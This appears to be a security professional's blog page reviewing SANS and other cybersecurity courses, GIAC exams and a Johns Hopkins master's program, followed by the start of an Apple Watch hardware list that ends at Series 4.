I had the opportunity to re-take this class, serving as a virtual Teaching Assistant (vTA) and I felt a re-review was warranted. Though this class is still definitely a mile-wide and an inch-deep in the context of cloud security / pentesting / etc… I think a lot of really great updates have been made since I first sat for the course. When I first took the course, I believe I did the SANS OnDemand version, whereas this time I took it via the Live Online format which has the added bonus of being taught live, in this case by the course author himself, Moses Frost. SANS courses are always good and I can’t express enough how impressed I always am with the instructors. They’re of course knowledgeable about the subjects they teach, but moreso they always come prepared with a world of experience and anecdotes about their relevant time as a practictioner in the domain at hand. What you come away with in the end is not only a better grasp on the material, but also a sense of the real world applications of what you just learned. Things seem possible, in a way that other eLearning formats fail to capture, as you don’t get the direct “face-to-face” interaction with an educator of a similar caliber. But enough waxing poetic about the instructors, let me tell you why I liked the content a bit more than last time.

Moses admits that this course is stretched a bit thin, as in an ideal world, full 5-6 day courses could easily be constructed for many of the sub-topics contained within this course - AWS, Azure, Kubernetes, Lambda, etc… At the time of writing this (re)review I don’t have my old books, so I can’t physically compare the deltas between the original version of the course and the latest version, but based on my recollection I feel the recon section (Day 1) has been modified to better relate to cloud-native-specific applications, a greater focus on attacking IAM is made on Day 2, the overall scope of the class is narrowed to just AWS and Azure (with a better balance between the two) and there were certainly tweaks elsewhere. Between the labs (which I actually took the time to do in this format), the moderately more focused content and the added expertise you get with the Live format, I think I can now safely recommend this course. It’s still merely an introduction at the end of the day, but I truly feel you come away with a practical set of skills and the information and hunger needed to pursue further learning in the space. Speaking of further learning, I also know that a more advanced version of their cloud pentesting curriculum is on the horizon. Stay tuned for the epic sequel, SEC688 - I’ve heard it will not be one to miss!

SEC537: Practical OSINT Analysis and Automation, SANS

Attended: July 2021

SANS has recently stepped up, adding a huge number of new courses, many of which are 2-day courses. SEC537: Practical Open-Source Intelligence (OSINT) Analysis and Automation is one of these 2-day-ers. This shorter format, when executed well, can provide SANS’ famed, high-density educational material without the usual mental burnout which accompanies a typical 5-6 day, 8+ hours a day SANS course. Many will also benefit from not having to taken an entire week off of work to attend. A shorter class suffers though when material goes off track. With so little time you quickly lose value as there is but two days to cram all the relevant material into the class. I think SEC537 is an excellent course and David Mashburn (who is one of the course authors) did a fantastic job both putting this course together as well as teaching, but it does suffer from this latter point. But enough about that, let’s get into the material…

Day 1 drops you immediately into a really cool discussion on OPSEC, covering everything from how to perform overt/covert/clandestine work to understanding exactly how your tools work - specifically, knowing what traffic they generate and where that traffic is destined. I would take an entire 6-day course on OPSEC if I could. The day wraps up with a section on image/video verification which I knew little about prior to the class but can definitely understand it’s OSINT-value now. Day 2 is where I think this class should be tweaked. This day begins with OSINT-relevant Python skilling but then unfortunately nose-dives into a very basic “intro-to-Python” lecture. For anyone who knows even basic Python, this section may disappoint. I recommend the intro Python material be moved to an appendix and be something the students learn if necessary as part of an after-hours bootcamp on Day 1. After half the day is spent learning basic Python, the class ends strongly with sections on interacting with the web programmatically (requests module) and performing Data Analysis with Python.

Not counting the intro-to-Python chunk, I think this course was one of the more interesting SANS courses I’ve taken (pound for pound, if you will). Quick Note: 2-day courses aren’t accompanied by a cert, so you really need only focus on learning the material. With everything said, this course being a SANS course means one inevitable thing - a high price tag. At $2900 for just two days, pricey is but one word to describe the course. I was fortunate to have taken this class via the SANS Workstudy, so my wallet was not subjected to the full-wrath of SANS pricing. Overall, I do recommend this course for the material, you need only find a way to finance it!

SEC460: Enterprise and Cloud | Threat and Vulnerability Assessment (GEVA), SANS

Attended: July 2021, GEVA Obtained: August 2021

SEC460 (Enterprise and Cloud | Threat and Vulnerability Management) is the newest edition (introduced in mid-2018) to the lineage of SANS X60 courses (i.e. SEC560, SEC660 and SEC760), all of which are part of the recently introduced SANS Offensive Operations curriculum. SANS course numbering is notoriously wacky but in this case, these four courses describe a pretty realistic progression from VM-to-pentester-to-exploit-developer (there are of course many other viable development paths into a career in penetration testing / offensive security). SANS courses with a 4xx designation have traditionally been more elementary in nature and though I think SEC460 certainly has some introductory concepts, it is far more than its course number lets on.

When this course first debuted, I certainly underestimated it - relegating it in my mind as some lowly Vulnerability Management (VM) training that entry-level infosec professionals would take to learn how to run a vulnerability scanner. Despite this, my background in VM coupled with my lust for shiny things made me want to take the course anyways. When I got the chance to moderate the course I could not pass it up. Once in the class, it quickly became evident (within the first few hours of Day 1) that I had vastly miscalculated the content and value of the course.

SANS is known for its (expensive) high-value content as well as their world-class instructors. This is especially true for SEC460. My instructor for the course (and one of the course co-authors) was Matt Toussain. Matt (@Osm0s1z) did a truly amazing job both as an instructor as well as on developing the course content. His experience, expertise and professional anecdotes really take the course experience to the next level (in my opinion). Ok, now about the course… Despite what I originally thought, the course covers not only typical Vulnerability Management and network scanning concepts but also covers a variety of other relevant subjects including (but not limited to) - Powershell, Cyber Threat Intelligence (CTI), threat modeling, OSINT, web application discovery, general reconnaissance, cloud security, Risk Assessment Frameworks (RAFs), wireless, purple teaming and Windows AD. The epiphany comes when you realize that these aren’t “bonus” items or filler material but rather integral knowledge areas for performing comprehensive, modern Threat & Vulnerability Management/Assessment. Building this course, the authors were faced with the difficult mission of adding a large volume of material in such a way that students were not fed merely surface-level information on important concepts while at the same time not laboring over topics at a depth beyond what is required. This course strikes that balance in a way that I have not seen with almost any other SANS course.

I’ve been involved with Vulnerability Management (VM) and/or Threat and Vulnerability Assessment (T&VA) for almost my entire professional career and I think this course nails 95% of what I’ve personally used to execute in a VM role while also introducing a variety of new things I honestly never knew or thought to use with respect to building/running a VM program. This course, despite its age, is in my opinion one of the more mature SANS courses available and one I highly would recommend not only to those new to the field or interested in the offensive security path, but also to more experienced infosec professionals and those in other, non-offensive-security roles.

About the GEVA: The certification exam (GEVA) is not too dissimilar from other GIAC exams - multiple choice and very heavy on material which is sourced almost word-for-word from the course books. My only complaint about this course or the cert itself is the over-reliance on terminology that I think is not industry-standard but rather SANS-specific terminology. For example - “Target Matrix” is a term used to describe the list of potential targets which comes as result of the Discovery phase of the Vulnerability Management Framework (VAF). Though this term makes sense, it’s not a term I have seen used before and to my knowledge, not something that is used industry-wide. Unfortunately, this micro-naming of concepts is very important for passing the exam (even if it’s not overly important to remember as an actual practitioner). So, tldr; is - make sure you pay attention to SANS terminology as you will be quizzed on it if you sit for the exam!

SEC450: Blue Team Fundamentals: Security Operations and Analysis (GSOC), SANS

Attended: July 2021, GSOC Obtained: September 2021

SANS SEC450 is a truly great course and one I would certainly recommend for all security pros on the “blue” side of the house but one I also think would benefit anyone else in infosec as well. My instructor (and the course author) John Hubbard does a fantastic job combining granular, practical exercises with high level, framework-based educational material. What you receive in the end is an amazingly succinct, yet potently high-value crash course on Security Operations. Day 1 introduces you to a number of high-level topics related to security operations in general. Days 2 and 3 have a lot of the technical meat - protocols, network architectures, endpoint security, logging, kerberos, etc… Day 4 introduces you to a wealth of security related models (e.g. Cyber Kill Chain, CSF, Diamond Model, F3EAD, etc…) and finally, the entirety of Day 5 is focused on improving as a security professional, something that I think would be a great addendum to every single SANS course as this section is really subject-agnostic and provides a lot of really high-value content. I think the real value of this course lies in Days 1, 4 and 5. These days gave me a better sense of how interconnected frameworks interlace with the high level concept of “operations” in security. I think many who look at this course may see it as an entry level course for traditional “SOC Analysts”. After sitting through it however, I think it is so much more. If you want to learn how to apply security best principles in an operational environment, regardless of your role, this is the course to take.

I don’t have much to say on the GSOC exam itself other than to say its contents very closely resemble what you find both in the books as well as in the practice exam. The one thing I will say is there seemed to be an inordinate amount of questions about Windows logging despite how small of a section that is overall.

SEC487: Open-Source Intelligence (OSINT) Gathering and Analysis (GOSI), SANS

GOSI Obtained: November 2022

I recently challenged the GIAC GOSI exam (which is the associated certification for the SANS SEC487 course). As I didn’t take the full course, I can’t directly comment on how good or bad it is. What I can comment on is my exam experience.

In general, the course appears to be incredibly comprehensive, stepping through just about every flavor of OSINT (e.g. HUMINT, SIGINT, IMINT, MASINT, FININT, SOCMINT, etc…). If you’re looking for tools, well they got tools - TONS of them! You’re going to want to be ready to bookmark a load of (naturally, open-source) tools. Unlike the wider universe of SANS courses, I found this one to have minimal overlap subject-wise with the many other courses I have taken. This is a good thing! No matter your experience with OSINT, I think you can immediately walk away with some new tricks, new tools and a boost to your practical skillset.

The exam experience is fairly straight-forward, as most GIAC exams are. My criticism of this test (like many other GIAC tests) is it doesn’t really test you on your practical skills/technical know-how, but rather tests whether you have memorized stuff from the books. There are a lot of questions like, “what tool is depicted in this picture?” or “what tool would you use for X purpose?”, then citing some niche website run by some researcher you might of only heard of had you taken the course and had the books on-hand. In the end, I do think this can be a valuable course for those who are interested in this type of work, but be weary of an attempt to challenge the exam!

SEC522: Application Security: Securing Web Apps, APIs, and Microservices (GWEB), SANS

GWEB Obtained: November 2022

I’ve been an AppSec professional in some form or fashion for nearly 10 years, and in that time I like to think I’ve learned a thing or two not only about how to attack and compromise a web app, but also the ways in which to defend against those attacks and better harden said applications. To test this theory, I challenged the GIAC GWEB certification (associated with the SANS SEC522 course.) As I mentioned in my recent GOSI review, challenging a SANS/GIAC exam is not for the faint of heart, as in many cases, the questions are sourced directly from the book material, and in these cases are often overly specific, relying on having memorized what was printed over having real practical experience/knowledge. For this reason, the exams can be somewhat artificially difficult (when bookless). I’m pleased to say however, that my experience with the GWEB ran contrary to that trend. Questions were much more practical in nature, often worded in a scenario-like form rather than a simple memorization exercise. At times, questions delved beyond surface-level understanding, but overall, this exam (and presumably the course as well) remains a mile wide and an inch deep (so to speak), covering everything from HTTP basics, to common attack defenses, AuthN/AuthZ, web services and beyond. SANS is known pretty well for their great portfolio of offensive security courses, and for good reason! However, this course’s dedication and focus on defense and architectural best practices makes it somewhat unique and in my mind, quite special.

MGT512: Security Leadership Essentials for Managers (GSLC), SANS

Attended: August 2022, GSLC Obtained: December 2022

MGT512 is SANS’ flagship management course and I’ll start by giving the course a ~B for staying high-level and “managerial”. There are certainly a few sections (looking at you Days 2 & 3) where things get a bit overly technical for what I would expect in a course for managers. Then again, wouldn’t it be something to have leaders who had a certain level of technical proficiency? For the course itself, be prepared to think CISO, as the typical SANS course week-end CTF is replaced by a week-long choose-your-own-adventure style game where you act as a security leader making decisions for a fictional company. Maintain a practical, NIST CSF-balanced approach to achieve victory, and of course, the challenge coin! When you’re not bogged down learning about low-level encryption stuff (or similar technical minutiae), you’re back to big-picture items - learning about the frameworks, policies, program structures and other risk-governed concepts that rule the lives of security leaders everywhere. So is this a good course? Hard to say. I personally, didn’t get much out of it, but I’ve been in infosec for 12+ years as of writing this mini-review and have spent plenty of time across nearly all infosec disciplines. For managers looking to make sense of it all though, I suspect this would be quality content.

For those interested in taking the GSLC exam, it is very reminiscent of other content-broad exams (e.g. Sec+, CISSP, GSEC, etc…). With a fair amount of scenario-based questions (rather than pure memorization questions GIAC exams are known for), there is certainly some challenge and you should be relatively versed in the days material to achieve a high score. That said, with 3 hours to answer 115 questions, you have ample time to leverage the books in case you need to look up some answers or find references to assist you with a tricky question or two (or 50). Interestingly, I found this exam to be a bit more challenging than the usual GIAC exam, but with a passing score of only 65%, success is pretty easy to come by.

* My thanks to My-Ngoc Nguyen, who kept the course days very lively and fun!

Windows Malware and Memory Forensics, Volatility

Attended: October 2016

I took this course at a point in time where I was seriously unprepared for it. For this reason, I can’t really give a recommendation on the course itself. However, I will say that before you consider taking this course, you are going to want to pay close attention to Volatility’s expected prerequisites. This class is not for the faint of heart and requires some serious pre-requisite knowledge.

I wanted to add here that though I didn’t learn Volatility nearly as well as I had hoped during the course, having been severely underprepared for the course at the time I took it, I did have a lot of fun using strings to conquer WAY too many of the CTF questions on the final day. Don’t discount the power of Strings and GREP!

The Shellcode Lab, Black Hat

Attended: July 2017

I took this course while at Blackhat one year and came away really impressed. It’s one of those courses that takes what seems to be a pretty advanced and relatively opaque subject and makes it very approachable. By the end of those course I felt I had acquired a lot of practical skills. I recommend anyone interested in this class to have some familiarity with Intel assembly but after that, I think its relatively approachable and definitely recommended!

SANS SEC564 Red Team Operations and Threat Emulation

Attended: March 2018

Red Teaming is one of the apex disciplines of the Cybersecurity field. SANS, as one of the premier cyber security education providers in the world offers only a two-day course covering the subject. This speaks to the niche-ness of Red Teaming as well as it’s advanced nature. This course, formerly taught and authored-by Joe Vest (the course author is now Jorge Orchilles, creator of the C2Matrix) is one of the best, most-concise introductions to Red Teaming I have found and would be valuable for anyone who is looking to stand up a Red Team practice at their organization. Being a SANS course, the price is still steep, but at only two days and given the fact that your organization should really be paying for you to take the course, I definitely recommend it. It is important to note that this course is NOT technical in nature. It certainly won’t get into the gritty technical aspects of red teaming, nor does it really explain with any sort of technical depth, the nature of standing up any sort of red team infrastructure. For this, I recommend taking a look at the SpecterOps Adversary Tactics: Red Team Operations training. With this said, I think performing successful red team engagements requires a thorough understanding of what red teaming really is, especially compared to traditional penetration testing, as well as an understanding of all the moving parts, players, stakeholders etc… This course will help you achieve that understanding.

SANS SEC642 Advanced Web App Penetration Testing

Attended: May 2018

SANS’ top tier web-app specific penetration testing course is a bit hit-and-miss in my opinion. The problem with any “advanced” course is that it’s really difficult, in any 6 day period (which is the length of your typically full SANS course) to cover even a small fraction of the known techniques applicable to any specific penetration testing discipline, in this case web application penetration testing. Given everything that could be covered, SANS authors decided on SQLi, XSS, File Inclusions, XSRF, attacks specific to some web frameworks, crypto attacks, some WAF bypass stuff, and a little bit on Flash, SOAP, WebSockets and HTTP/2. This list obviously misses a gigantic swath of the web attack surface and even within this list itself these concepts are only barely touched. By far the most interesting day (for me) was the day on crypto-attacks but even that I’m skeptical as to the real practicality of what I learned. I’m not saying I didn’t learn anything useful in 6 days, but I think anyone at the stage in their career where they are interested in “advanced web application penetration testing” is better off with other educational mediums. You could probably learn more in 6 days just reading bug bounty writeups for example! An added negative is that this course currently does not offer a certification, so at the end of the day, you’re really only taking this course for its content - and at $7k+, I think you’re money is better spent elsewhere.

Update: Looks like this course is now officially deprecated (for now). RIP.

SpecterOps Adversary Tactics: Red Team Operations

Attended: June 2018

SpecterOps is a (primarily offensive) security consulting company specializing in (bleeding-edge) research, assessments and training. Prior to taking their Red Team Operations course, I was familiar with them as the creators of both Empire and BloodHound. For a four day course on what is a very advanced, and very broad subject - I think the Red Team Operations course is outstanding. It covers both managerial and technical aspects of Red Teaming, everything from initial access operations (IAO) and establishing C2 to persistence, privesc and pivoting, all while in a modern, Windows-based AD environment. Within the labs you’ll get real, practical experience with the tools of the trade (e.g. Cobalt Strike) and modern techniques. With this said, I don’t think this course alone can take someone who isn’t already a red teamer and make them one over the course of four days. Even as deep as this course gets, the nature of Red Teaming is one that requires breadth and depth far beyond what this course can offer. For this reason, I recommend this course for those who already possess a moderate to advanced penetration testing background or those with entry-level experience in red teaming. I’ll also point out that this training is useful (as is most trainings) only if you have the ability to practice what you’ve learned after-the-fact. Unlike a lot of other security disciplines, adversary emulation is difficult to “practice” in a lab environment, you need both a legally-appropriate and willing test-subject. This means your best-off if you are already part of an internal red team or are looking to stand one up at your organization. Without this in place, I don’t recommend taking the course.

Offensive Security Advanced Windows Exploitation

Attended: August 2019

The AWE is Offensive Security’s most difficult and arguably most prestigious certification, focusing exclusively on advanced, modern, Windows exploit development. With an interest in vulnerability research and thus an interest in exploit development, coupled with some experience in exploit writing and reverse engineering I decided to sign up and make my way through the course. Offered only in-person at the yearly Black Hat security conference and with very limited seats available, I was lucky to have been given the chance.

Now I will admit that at the time I sat for this course my exploit development skills and experience were certainly more on the beginner-side but based on my observations of other students in the class, I can say with no doubt, that this course is every bit as mind-melting and challenging as you might expect or have read in other reviews, even for those with far more experience than I. In hind-sight, I’m comfortable enough to say that I was out of my depth and would have been better served taking the course after I had a little more experience. But perhaps more importantly, I should have waited to take the course for when i was truly ready both mentally and professionally, to dive fully into the world of vulnerability research and exploit development.

This takes me to my advice for those thinking about enrolling. If you aren’t already a vulnerability researcher, penetration tester, exploit developer or aren’t thinking about making the shift into that realm in the near-ish future, I probably would not sign up for the course. Without a good amount of preexisting experience or knowledge, theres a decent chance the material will fly over your head. But also, if you don’t plan on exercising what you’ve learned in short order, your unlikely to retain a lot of the information, nor will you be able to properly study for and take the extremely challenging OSEE certification. With all this said, I do think that for those that are mentally (and emotionally) prepared, this course could really help someone push themselves further into modern exploit development and vulnerability research.

JHU Masters in Cybersecurity Review

Starting in mid-2016 and finishing up almost exactly 4 years later in 2020, I finally completed my Masters degree at Johns Hopkins University, achieving an MS in Cybersecurity. This program proved both challenging and rewarding as well as at times disappointing and even quite useless. I want to say early on in this review that I don’t recommend people sign up and self-pay for any Cybersecurity masters degree. I don’t think in the infosec industry, there is any significant professional value with having a masters, outside of maybe qualifying for some manager roles. This is especially true given the time and money you must invest to even get a masters degree. They are expensive and in most cases, it seems that having a certification or two will more than satisfy contractual, HR or hiring manager requirements. In my case, my company was willing to foot the bill for the program and seeing the opportunity, I decided why not!? I of course fully recommend taking advantage of free, employer-sponsored training wherever possible.

So how did I decide on the JHU program? Since I would still be working full time I needed to limit my choices to online programs only. Preferably as well, I wanted to choose an institution that was close by in the event that I needed to go on-campus for some reason, either to speak with a professor, collaborate with fellow students or take a class only offered on-premise. Living in the northern Virginia/DC metro area this still left me with a good number of options. With these requirements in mind I considered the following programs, University of Maryland University College (UMUC), University of Maryland (UMD), Johns Hopkins University (JHU), SANS Technology Institute and George Mason University. I won’t get into all the small decisions that ultimately led to me choosing the JHU program but in general I chose it for three reasons.

First, and most importantly, I liked the available courses more so than any other program. Namely, I was interested in the reverse engineering course, embedded systems course and the cyber physical systems course. My primary focus with this degree was to focus on the learning aspects rather than just the idea of having a masters degree for my resume.
Second, after some research, it looked like the JHU program was rated very high if not the highest among online Cybersecurity masters programs. I took this as a sign that this would be the best bet in terms of getting a high-quality, masters-level Cybersecurity education.
Third, I felt that Johns Hopkins had a particular prestige, especially in my area, and that having a degree from there would look good on my resume.

So how were the Masters classes? Well first, prior to getting accepted “officially” into the Masters program I needed to take a few additional pre-requisite courses. This included a Java class, a course in Data Structures and a course in “Computer Organization” (Discrete Mathematics and Python are also required pre-reqs but I had already satisfied these through undergraduate and professional work). All three of these courses were great additions to what was my overall masters curriculum and interestingly enough, three of my favorite courses I took over the course of getting the degree, despite none of them actually be masters courses (they were bachelor-level courses). The Java course is self explanatory, it was simply a beginner-to-intermediate-level course in Java programming. The Data Structures course I found fascinating and pretty invaluable. To this day I still use the concepts I learned in this class for both my personal/professional development efforts as well as for understanding concepts related to modern operating systems, memory, reverse engineering, etc… The Computer Organization course was primarily centered around assembly programming. This has proven to be very useful foundational knowledge for my forays into reverse engineering, exploit development and general security research.

Once I finished the necessary pre-reqs I was formally accepted into the Masters program and now needed to complete the 10 Masters courses. Three of these are mandatory courses - Foundations of Algorithms, Foundations of Information Assurance and Cryptology. Foundations of Algorithms is advertised as the sequel to Data Structures and maybe in theory it is, but I found the class (and I can not stress this enough) completely useless, entirely opaque, and overtly difficult. In fact, the professor even suggested, during an office hours one night, that the class did not make sense for anyone who wasn’t in applied mathematics or certain (more abstract) disciplines of computer science. The course content, assignments and projects were all nearly impossible to follow, to the point where the professor would essentially just give us the answers since he knew how difficult the material was. Overall this class was a complete dud, in all respects. It was a waste of my time and I learned absolutely nothing. Unfortunately, it was required and therefore I could not get out of it, nor can anyone else in this program. Moving on… The “Foundations of Information Assurance” course was your typical “intro to information security” type stuff. Given my experience in the field, I did not personally get much value out of this course. Now if you had less experience in the field or are coming into this Masters program fresh out of your undergrad or early enough in your Cybersecurity career, I can definitely see how this class would prove beneficial to building your understanding of the fundamentals of infosec. So again, kind of a dud for me. The third and final mandatory class was in Cryptology. This class, unlike the first two, I found challenging, interesting, relevant and worthy of the Cybersecurity masters class designation. This was a highly technical class where you really are taught how modern ciphers work, the mathematical principles that are the groundwork of these cryptological constructs and are even taught cryptoanalytic techniques. My word of warning for those who are getting ready for this course is to take it seriously, not only because it is challenging but because it is information dense and it is knowledge you really are going to want to try and commit to memory as best you can.

In addition to the three required classes, I needed to choose seven electives from their catalog of courses. The seven I chose are listed below (in the order I took them).

Elective Classes

Principles of Data Communications
Embedded Computer Systems
Software Development for Real-Time Embedded Systems
Reverse Engineering and Vulnerability Analysis
Operating Systems
Web Security
Intrusion Detection

I’d like to quickly review and give my thoughts on each of these below…

Principles of Data Communications

One of the primary things I hoped to get out of experience with this Masters program was to get a deeper, more robust understanding of TCP/IP and computer networking. I wanted to understand these concepts from a purely academic perspective, rather than an applied one as I had received via an assortment of training courses (such as the SANS course SEC503). JHU offers a variety of courses related to this domain, all of which required this course, Principles of Data Communications, to be taken as a pre-req. This course primarily covers the Layer 1 (physical layer) aspects of network communications focusing on topics such as digital vs analog encoding, multiplexing, signaling, error-detection, data compression and more advanced topics. Though I found this course very interesting, I think it was a little TOO low level for what I was looking for. I would need to take a different class to cover networking concepts related to layers 2-4 which was after all, my primary interest in taking this class in the first place. Ultimately, I only recommend this course for those who really want to know these low level mechanics. Then again, this course is also a pre-req for almost all other courses in the networking track for this degree program so you may have to take it regardless if you have your eyes set on something which requires it.

Unfortunately, out of the 6 other electives I chose from here, none of them actually ended up being one of the classes that would focus more on networking or TCP/IP! Oh well, sometimes even the best-laid plans go awry.

Embedded Computer Systems

Having an interest in vulnerability research, especially in the realm of IoT, got me hooked on the idea of learning more about embedded systems. So much so that I decided to take not one but TWO electives on the subject, this class and a class on software development for embedded systems. This first class I felt was a real dud and was pretty much useless. The class was mostly a series of bizarre “case studies” that hardly had anything to really do with embedded systems. Not once did I get to dump firmware off of an embedded system or even physically do anything with an embedded system. There was nothing about the course which was even remotely practical, or interesting in any way. At certain points the course material would pivot into even softer subjects like “copywright law” or “licensing agreements”. This class ended up being a huge disappointment and I would not recommend it to anyone.

Software Development for Real-Time Embedded Systems

The second of two embedded systems-related classes I took focused on software development for embedded systems, more specifically, development on real-time systems (RTOS). This class was extremely practical as we spent the entire time actually writing code for arduino systems and even building a drone-system with a variety of sensors all interfacing with the arduino. I greatly enjoyed this class and felt like i learned quite a bit on the subject. Unfortunately, I’m not entirely sure how useful this knowledge has been (so far) with respect to my career. I’ll also point out that the use of a drone for this class was highly suspect as the drone kit was not particularly easy to use and all lab deliverables required videos of the drone being successfully flown while also performing a number of other in-flight operations. This put those who were not particularly great drone pilots (like myself) at a bit of a disadvantage. I appreciate the spirit of what the professor was going for here but I think the class would have been better served with something a bit easier to control like an RC car.

Reverse Engineering and Vulnerability Analysis

The class on reverse engineering and vulnerability analysis was by far my favorite course and I believe, objectively-speaking, the best course I took throughout the course of my Masters program. This class is the perfect mix of both theory and practical exercises, set to an extremely fast pace. Within the first week you will have covered and began deciphering Intel assembly instructions as well as started writing your own Intel assembly disassembler! By the end of the class you will be doing full malware reverse engineering and even writing your own exploits from scratch. This class was no joke! I can’t recommend this class enough, especially for those interested in these advanced topics.

Operating Systems

This course was a bit of a mixed- bag. From a theory perspective, this course was exactly what I was looking for. It covered all the core operating system constructs (e.g. interrupts, kernel types, system calls, system architectures, system programming, scheduling, I/O, multi threading, memory, task management, deadlocks, device drivers, file systems and more!). Execution of the practical side of this course was where the big let down was. Namely, the course author decided to have all assignments and labs (all of which were heavily focused on system programming) be based on the strange, little-heard-of, not-modern, Minix 3 microkernel-based operating system. Now I had never heard of Minix 3 and asking my coworkers about Minix yielded a similar response. What was Minix 3 and why would my professor think this was a good platform to teach OS concepts? I mean, it doesnt even use a modern architecture, Minix 3 after all is a micro-kernel architecture as opposed to a more modern, monolithic or hybrid-based architecture. This course required a pretty firm understanding of C programming as well as some prior experience in Unix system programming, neither of which I really had. Picking up C was easy enough but learning to write code specifically for an operating system that no one uses and thus has little references online, proved to be a real struggle. I’ll also add here that the professor was particularly non-helpful when it came to actually teaching these more practical concepts. Perhaps the expectation was that this was something I should have already known coming into the course. Either way, I found the system programming segments of the course to be frustrating and stressful as they were a very large part of my final grade. Ultimately I did prevail and though I have some pretty big issues with this particular aspect of the course, I do think overall I would continue to recommend it to those who want to learn more about operating systems. My recommendation to Johns Hopkins however is to use a more relevant, modern operating system (like actual Linux!) as the practical foundation for this class.

Web Security

This course was an interesting overview of the wide-variety of web-related technologies a security professional must consider, with topics including web-based crypto, writing RESTful APIs using Flask, AWS cloud, SAST/DASTWAF concepts, IoT protocols, container technologies such as Docker, open-source vulnerability scanners and finally a module on traditional web-application vulnerabilities such as XSS, SQLi etc… I found this course to be a little meandering, never doing anything more than scraping the surface of each of these topics. Yes, there were some interesting practical exercises sprinkled throughout but mostly I found that getting a “taste” of so many things was not that valuable (to me personally). I’ll qualify this by saying at this point in time I had several years of web application security and cloud experience so some of this material may have simply just not been that new to me and thus I found the lectures and assignments a bit boring. For someone interested in getting a look on everything “goin on” in the web security world, I think this course can satisfy that specific need. Outside of that, I think most people might leave this class just hungry for something a little more substantial.

Intrusion Detection

My seventh and final elective was Intrusion Detection. I had not intended to take this course and only did end up enrolling due to availability and scheduling issues related to another class I had planned on taking. It was my final semester however and at this point I really wanted to close the book on this program and move on to other things in my life! It turns out that I’m happy I took the course as it was (similar to my Reverse Engineering course) a really satisfying mix of both theory and practical exercises. Notably, I’d like to call out the excellent labs (assigned weekly) which covered a wide variety of tools (some of which I did have prior experience with) such as Nmap, Linux, TripWire, OSSEC, Snort, Neo4j, Cypher, Zeek, iptables, ROC analysis, Keras and RapidMiner. I definitely recommend this class for anyone looking to get some good experience with any one of these tools and learn more about general intrusion detection in the process.

What I wish I had done differently

Having finally graduated, I wanted to take a look back at my experience both with JHU at a high level and with each of my classes and reflect on what I may have done differently. First I want to say that if I could go back in time, I would stilll choose the JHU program over any of the other schools I had considered. What I would change however is some of the classes I took. I’ve made it clear in my reviews above what classes I thought were good, which had value specifically to me and which classes I thought were awful. Out of the 10 masters-level classes I took, three of them I found both well done and applicable/valuable to my career, three of them I found very interesting and well done yet not particularly relevant to my career, two of them I found a little too “high level” and not particularly useful and another two I thought were just atrocious. Looking at these numbers it’d be easy to come to the determination (with only 3 classes I actually thought were useful to me) that I didn’t get out of this program what I had hoped. Had I chose different classes I certainly would have gotten more out of the program but I am thankful for what I was able to learn. Some classes I would have liked to try instead include offerings on Java Security, Cyber Physical Systems Security, Operating Systems Security and even Digital Forensics. I’ll add that there seems to have been some significant changes to the course catalog since I graduated (which was only a few weeks ago as of this writing) with more courses having been added, notably classes on DevOps and “Assured Autonomy”, both of which might have been interesting to me and would certainly be worth checking out for anyone considering this program. After taking the class in reverse engineering and vulnerability analysis, the professor suggested, for anyone who was interested, doing an Independent Study in place of a typical elective. This would offer the same three credits but allow for a more exploratory, research-oriented approach to the reverse engineering material (or any other class you would be interested in). I seriously considered doing this for reverse engineering but ultimately decided not to. I regret this decision and recommend those who are taking this program to not be lazy and do what you think sounds interesting, even if it will be more work.

Retrospective

It’s really incredible and I’m extremely grateful for all the opportunities I’ve been given over the last 5 years and though there are plenty of things I would change if I could go back and somehow make adjustments along the way, I am ultimately very satisfied with how everything has turned out and the choices I made. In closing, I have just a few parting nuggets of “wisdom” / advice I’d like to share.

Make an effort to continually re-focus, frequently ask yourself what you want to do or where you’d like to be and make constant adjustments to better reach that goal. It’s easy to be swept into something or fall into a “comfort zone” such that you drift away from where you really want to be.
Appreciate all opportunities and try not to discount the things you may learn that you think are not relevant or useful. Too many times have I had the chance to learn something I didn’t think was useful so I never really committed myself to it, only to later realize i DID want to know it and was then force to teach myself again. You’ll save yourself plenty of time and headache by just having an open mind and being as much of a willing knowledge-sponge as possible.
Revel in the fact that infosec is such a cool and exciting field! One that for those who are motivated enough, can be a place of rapid development and overwhelming opportunity. Take advantage of the vast network of people just like yourself who are looking to share their experiences, network and continuously learn.

Thanks so much for reading, whether it was the entirety of this article (I know it’s quite long) or any given section. I hope some of it was enlightening or valuable and if there are any questions or you’d like to know more / share your own experiences I’d love to hear about it! Feel free to reach out anytime!

Apple Watch Hardware Progression

Wed, 23 Sep 2020 10:50:00 -0400

The evolution of the Apple Watch is characterized by relatively small, incremental updates each generation. Year after year, these small changes inevitably invite the question… “So what’s actually new this year?”. To answer this question, new hardware features between each generation of the Apple Watch are enumerated below.

Jump to Series X

Series 0
Series 1
Series 2
Series 3
Series 4
Series 5
Series 6
Series 7
Series 8
Ultra
Series 9 & Ultra 2
References

Series 0

Released April 24, 2015 - The original Apple Watch had a large variety of sensors though ultimately suffered from poor performance.

AMOLED Retina display (450 nits brightness, Force Touch, sizes 38mm and 42 mm)
Apple S1 SiP
8 GB onboard storage
512MB RAM
NFC
WiFi 802.11b/g/n 2.4GHz
Bluetooth 4.0 LE
Accelerometer (16-g)
Gyroscope
Heart rate sensor
Ambient light sensor
Microphone
Speaker
Linear actuator Taptic Engine
IPX7 (splash) water resistance (1 meter)
Edition: 18 karat yellow or rose gold

Series 1

Released September 16, 2016 - The ‘Series 1’ was Apple’s attempt to correct the CPU issues that plagued the original Apple Watch (a.k.a. ‘Series 0’). [Performance Release]

Apple S1P dual-core processor
OLED Retina display (1st-generation) w/ Ion-X glass
Bluetooth 4.2
Capacity 8GB

Series 2

Released September 16, 2016 - The ‘Series 2’ was released alongside the ‘Series 1’ and brought with it a 2x brighter screen, vastly improved water resistance and a GPS module. This ultimately improved it’s ability to perform fitness-related tasks. [Fitness Release]

OLED Retina display (2nd-generation, 1000 nits brightness)
Water resistance up to 50 meters (WR50)
GPS (GLONASS)
Apple S2 SiP
Larger Taptic Engine
Speaker pump (to remove water from speakers)
Edition: Ceramic

Series 3

Released September 22, 2017 - The ‘Series 3’ introduced LTE cellular models as well as a barometric sensor and even more-improved processor. [Connectivity Release]

LTE and UMTS cellular (eSIM)
Barometric altimeter sensor
Improved processor (Siri can now audibly speak)
Apple S3 SiP
GPS (Galileo, QZSS)
Capacity 16GB
768MB RAM
LTE models Digital Crown featured a big red dot
Ceramic sensor housing/back of device
Optical heart sensor
W2 wireless chip

Series 4

